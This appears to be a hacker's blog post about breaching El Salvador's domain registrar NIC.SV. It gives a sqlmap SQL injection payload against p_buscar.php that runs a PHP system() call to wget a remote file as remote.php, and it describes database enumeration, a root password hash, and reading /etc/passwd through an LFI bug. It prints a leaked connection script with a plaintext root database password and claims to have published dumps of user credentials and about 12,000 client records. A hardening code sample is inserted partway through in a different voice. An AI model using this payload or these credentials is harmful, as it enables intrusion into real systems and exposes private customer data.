Hacking a domain registrar

I was fucking bored one afternoon when a shitty fellow of mine contacted me and asked if I had ever tried to get into a domain registrar, specifically the one from El Salvador, NIC SV.

He asked me this because he knows I've been to El Salvador and used to help the fellow Anons from SV. The thing is, I had never really thought about it, but it got my attention, so I fired up my terminal and started poking around the web portal. Since I was in need of a few beers and feeling lazy, I only scanned the web server.

Truth is, it didn't take much to find a SQLi vulnerability, and then another one, and another one, and so on. I found around 12 different SQLi vulnerabilities, 1 LFI vuln and a bunch of blind SQLi vulns.

Since I had a bunch of options to use for exploitation, I used the first one I came across. The vulnerable parameter was (and still is) in p_buscar.php.

All it took was sqlmap with the following POST data:
data="requireddominio=%3C%3Fphp+system%28%27wget+google.com%2Fx.txt+-O+remote.php%27%29%3B+%3F%3E&nivel=.com.sv&key=consult"

With this I was able to enumerate 11 databases:
available databases [11]:
[*] mysql
[*] SVNET
[*] SVNET2
[*] SVNET2011
[*] SVNET3
[*] SVNET4
[*] SVNET_DEV
[*] test
[*] wordpress

Found some candiez
User: root
Pass: *4C169475AC505CDF29B9D6FC069D8F405DEB1110

AND

Database: SVNET
Table: USUARIO
[7 entries]

With this I had the root username and its password hash (at least it was hashed (lol)).
Possible hashes:
[+]  SHA-1
[+]  MySQL5 - SHA-1(SHA-1($pass))

This is more than enough to start brute-forcing the hash and log in to the web portal as administrator or SSH into their server, but I'm not a defacer. More of a pentester than anything, so I just kept going and found some more candiez.

As mentioned above, I also found an LFI bug, which can be confirmed by clicking here.

As you know, an LFI vulnerability lets an attacker read local files off the server, /etc/passwd being the classic proof. With this vulnerability I could read the server's /etc/passwd, as shown:


In case they finally fix this, you can still check it here.

Using all of this I was able to browse their .php scripts and even copy some sensitive data that should NOT be available to external users.

Here are some PHP scripts I got:
connections_conectar.php
<?php
# FileName="Connection_php_mysql.htm"
# Type="MYSQL"
# HTTP="true"
$hostname_conectar = "localhost";
$database_conectar = "SVNET2011";
$username_conectar = "root";     // the web app connects as MySQL root
$password_conectar = "xkzygg";   // password hard-coded in the source
// Persistent connection via the old mysql_* extension (removed in PHP 7.0).
// On failure the MySQL error text is raised as a PHP notice, which with
// display_errors enabled ends up in the HTTP response.
$conectar = mysql_pconnect($hostname_conectar, $username_conectar, $password_conectar) or trigger_error(mysql_error());
?>

This is the script that connects to the local database "SVNET2011" using the username "root" and the password "xkzygg".
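For contrast, here is an added example (my code, not NIC.SV's) of how that connection, plus a parameterised domain lookup of the kind p_buscar.php exposes with its dominio and nivel fields, would look once hardened: credentials come from the environment, the app uses a low-privilege account, the zone suffix is allowlisted and the label is bound instead of concatenated. The table and column names, the account name and the zone list are assumptions.

```php
<?php
// Added example, not the registrar's code. Table/column names, the
// low-privilege account and the zone list are assumed.
declare(strict_types=1);

// 1. No credentials in the source tree, and never connect as MySQL root.
$dsn  = 'mysql:host=localhost;dbname=SVNET2011;charset=utf8mb4';
$user = getenv('SVNET_DB_USER') ?: 'svnet_web';   // account with SELECT only
$pass = getenv('SVNET_DB_PASS');
if ($pass === false) {
    http_response_code(500);
    exit('database credentials not configured');   // no mysql_error() leak
}

$pdo = new PDO($dsn, $user, $pass, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);

// 2. Allowlist the zone suffix instead of trusting what the client sent.
$zones = ['.com.sv', '.org.sv', '.edu.sv', '.gob.sv'];   // assumed list
$nivel = $_POST['nivel'] ?? '';
if (!in_array($nivel, $zones, true)) {
    http_response_code(400);
    exit('invalid zone');
}

// 3. Validate the label as a DNS label, then bind it: user input never
//    becomes part of the SQL text, so the p_buscar.php injection is gone.
$dominio = $_POST['dominio'] ?? '';
if (!preg_match('/^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i', $dominio)) {
    http_response_code(400);
    exit('invalid domain label');
}

$stmt = $pdo->prepare(
    'SELECT nombre, estado FROM dominio WHERE nombre = :nombre AND zona = :zona'
);
$stmt->execute([':nombre' => strtolower($dominio), ':zona' => $nivel]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

header('Content-Type: application/json');
echo json_encode(['disponible' => $row === false]);
```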

Besides the mentioned script, I also found the following:
htdocs_ajax_proceso.php 
pagos.php
registro_login.php
wp-config.php

Using the SQLi vulns I was able to extract loads of usernames, emails and registration passwords. You can find a short list of only 180 usernames, emails and passwords by clicking HERE; this will take you to a pastebin.com page with the list.

Another juicy file I got is V_SUBDOMINIO_CLIENTE_ADM_INFO_NIC_SV.
This file contains a list of client names and phone numbers registered at "NIC.SV".
I created a *.csv file which contains approximately 12k (12,000) entries. The file can be downloaded from Mega by clicking here.

The worst of all of this is that I contacted the support staff of NIC.SV to let them know about the serious problems they have so they could fix them. Here I post some screenshots of the communication I had with them.

After no more than 24 hours I got a reply from them stating that they were already working on correcting the issues exposed above, as shown.

So I waited for them to be fixed, but even after several months they still weren't. And I know they're not, because I was able to dump everything again using the very same vulnerabilities I found months ago. That is lame, and it terribly sucks for their clients, since they and their information are not being protected because of lazy admins. That's the reason I'm publishing this article today: maybe if they see this online and public they'll get around to fixing their shit.


Regards,

Iggy
